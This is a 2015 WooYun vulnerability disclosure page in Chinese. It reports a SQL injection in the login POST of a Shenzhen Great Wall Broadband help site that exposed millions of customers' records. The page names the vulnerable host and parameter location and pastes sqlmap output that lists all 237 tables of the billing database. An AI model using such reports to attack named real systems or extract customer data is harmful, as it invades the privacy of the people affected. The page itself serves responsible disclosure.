当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132298

漏洞标题:深圳某宽带系统SQL注射(泄露几百万用户套餐信息+宽带充值业务记录)

相关厂商:长城宽带

漏洞作者: 路人甲

提交时间:2015-08-07 10:12

修复时间:2015-09-24 15:06

公开时间:2015-09-24 15:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-10: 厂商已经确认,细节仅向厂商公开
2015-08-20: 细节向核心白帽子及相关领域专家公开
2015-08-30: 细节向普通白帽子公开
2015-09-09: 细节向实习白帽子公开
2015-09-24: 细节向公众公开

简要描述:

详细说明:

help.szgwbn.net.cn 登录处POST包注射
抓包跑出几百万深圳长城用户信息,宽带付费业务购买记录等
以及部分子公司信息和设备MAC以及其他信息

漏洞证明:

sqlmap.png

150000.png

搜狗截图15年07月27日1332_13.png

搜狗截图15年07月27日1335_15.png

搜狗截图15年07月27日1336_16.png

搜狗截图15年07月27日1336_17.png

搜狗截图15年07月27日1338_18.png

搜狗截图15年07月27日1338_19.png

搜狗截图15年07月27日1344_20.png

mac.png

[13:41:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[13:41:02] [INFO] fetching tables for database: GwbnBoss
[13:41:02] [INFO] the SQL query used returns 237 entries
Database: GwbnBoss
[237 tables]
+---------------------------------------+
| A |
| AAQ |
| AP_Userlist |
| A_Blishi |
| AccountItemList |
| Account_Business |
| Account_Business_View |
| Account_Example |
| Account_Example0708 |
| Account_Example2009 |
| Account_Example2010 |
| Account_Example2011 |
| AcctTicket |
| AcctTicketBak |
| AcctionTypeTable |
| AliasList |
| AllCommunityIncome |
| AllTicket |
| AppointmentList |
| AreaList |
| AreaSheQuTable |
| AreaSheQuTablebak15 |
| Auditing |
| Bank |
| BankFee |
| BankFeeLog |
| BankProtocal |
| BankProtocalDetail |
| BankProtocalLog |
| BindModeList |
| BmdBmuTable |
| BmdList |
| BmuAreaTable |
| BmuBusinessTable |
| BmuBusinessView |
| BmuList |
| BossLog |
| BossLogRsCmdView |
| BossLogView |
| BrandList |
| BusinessList |
| BusinessType |
| CRM_CustomerList |
| CRM_CustomerOrderService |
| CRM_CustomerType |
| CRM_View |
| Card |
| ChargingUnitTypeList |
| ChargingValuatePolicyList |
| CheckStateList |
| CommunityList |
| CommunityListbak |
| CommunityListbak12 |
| CommunityListbak15 |
| CommunityListbak150207 |
| CommunityMachineRoomTable |
| ConcessionPolicyList |
| ConcessionSessionList |
| CreditList |
| CustomerCRMAttribute |
| CustomerCRMAttributeList |
| CustomerCRMAttributeManageDomainTable |
| CustomerCRMAttributeTable |
| CustomerList |
| CustomerType |
| DM |
| DM1 |
| DX_Customer |
| DX_Package |
| DX_UserPackage |
| DataDict |
| Day_AddUser |
| Day_AddUser2 |
| DevelopmenTypeList |
| DocCatalog |
| DocumentList |
| DocumentLog |
| DummyTrans |
| Dw_Dim_AccountItem |
| Dw_Dim_AccountState |
| Dw_Dim_Brand |
| Dw_Dim_Community |
| Dw_Dim_Customer |
| Dw_Dim_DevelopmenType |
| Dw_Dim_DevelopmentState |
| Dw_Dim_Package |
| Dw_Dim_PaymentType |
| Dw_Dim_Product |
| Dw_Dim_UserServiceState |
| Dw_Dim_UserType |
| Dw_Fact_AccountAccruals |
| Dw_Fact_AccountBusiness |
| Dw_Fact_Bosslog |
| Dw_Fact_SalePackageLog |
| Dw_Fact_User |
| DynPropertySupportList |
| EfectiveStateType |
| EffectiveStateCount |
| ErrorList |
| ExpireUserSalePackageLog |
| Falseusefeemingxi |
| FeeApportionView |
| FunctionInverseParam |
| FunctionList |
| FunctionPositiveParam |
| FunctionType |
| HDding |
| HDxian |
| IPTV_EquipmentList |
| IPTV_EquipmentLog |
| IPTV_EquipmentTypeList |
| IPTV_EquipmentUseLog |
| IPTV_PackageRights |
| IPTV_ProviderList |
| IPTV_TerminalCount |
| IPTV_TerminalList |
| InvoiceList |
| JTJYEffectiveStateCount |
| JTJYPresents |
| JTJYRMBRadiusMoneyTable |
| JTJYSalePackageSituation |
| MachineList |
| MeteringPeriodList |
| MeteringPeriodPolicy_Day |
| MeteringPeriodPolicy_Hour |
| MeteringPeriodPolicy_Month |
| OperateLog |
| Operation |
| OperatorRoleTable |
| PackageSatisticsList |
| PaymentTypeList |
| PolicyCombinationTable |
| PolicyList |
| PolicySessionList |
| PrepaidBalance |
| PresentList |
| PrintJobList |
| ProductAttrList |
| ProductAttrTable |
| ProductCommunityTable |
| ProductList |
| ProductRadiusAttrTable |
| ProjectList |
| ProjectListbak201312 |
| Quanzemingxi |
| RMBRadiusMoneyTable |
| RechargeCardList |
| RoleBusinessTable |
| RoleBusinessView |
| RoleList |
| RootAccountList |
| Rpt_Community |
| Rpt_CustomerList |
| Rpt_DocmentList |
| Rpt_Package |
| Rpt_ServiceHall |
| RsCmdList |
| RsCmdListbak |
| Rtp_Business |
| SalePackageLog |
| SalePackageLogNew |
| SalePackageLogbak20121217 |
| SaleTypeList |
| ServiceHallBmdTable |
| ServiceHallBmdTablebak11 |
| ServiceHallList |
| ServiceState |
| SheQuList |
| StatisticsUserInfo |
| StoredProcedureList |
| TimePolicyList |
| UnitTypeList |
| UserBackFeeBill |
| UserBill |
| UserHistory |
| UserLinkInfo |
| UserList |
| UserPriceAdjustment |
| UserProductCustomizeAttrTable |
| VBossLog |
| VBossLog2 |
| VBossLog_SMS |
| VCustomer_Num |
| VSalePackageLog2 |
| V_AccountExample |
| V_Account_Business |
| V_Account_Example |
| V_CommunityList |
| V_Customer_PriceAdjust |
| V_Customer_User |
| V_Customer_User_SMS |
| V_Customer_User_Test |
| V_Customers |
| V_UserLocationTag |
| V_UserLocation_Test |
| V_User_RFID |
| ValuateList |
| VlanList |
| Websysuser |
| YS1 |
| Account_Business07-09 |
| BossLog07-09 |
| vLiuShi-old |
| dtproperties |
| saleceshi |
| sys_user |
| sysdiagrams |
| vAllUser |
| vBA_Business |
| vBA_BusinessAccount |
| vBA_BusinessCustomer |
| vBA_BusinessCustomerInfo |
| vBA_BusinessDocument |
| vBA_BusinessLog |
| vBA_BusinessSale |
| vBA_DevisionOfWorks |
| vBA_RootAccountList |
| vBankFee |
| vBankProtocal |
| vCustomerUserList |
| vInvoiceList |
| vLiuShi |
| vNewOpen |
| vPolicyList |
| vProductFeePeriod |
| vProductSet |
| vProduct_MeteringPeriod |
| vReceiptList |
| vSalePackageLog |
| vSalePackageLog2_base |
| vUserAccount |
| vXuFee |
| vsys_user |
| yuyue |
| 商业收入检查 |
| 在网用户数社区统计 |
| 月流失统计 |
+---------------------------------------+
[13:41:02] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\o
tput\help.szgwbn.net.cn'
[*] shutting down at 13:41:02

当前裤所有表段

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-10 15:04

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:12
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论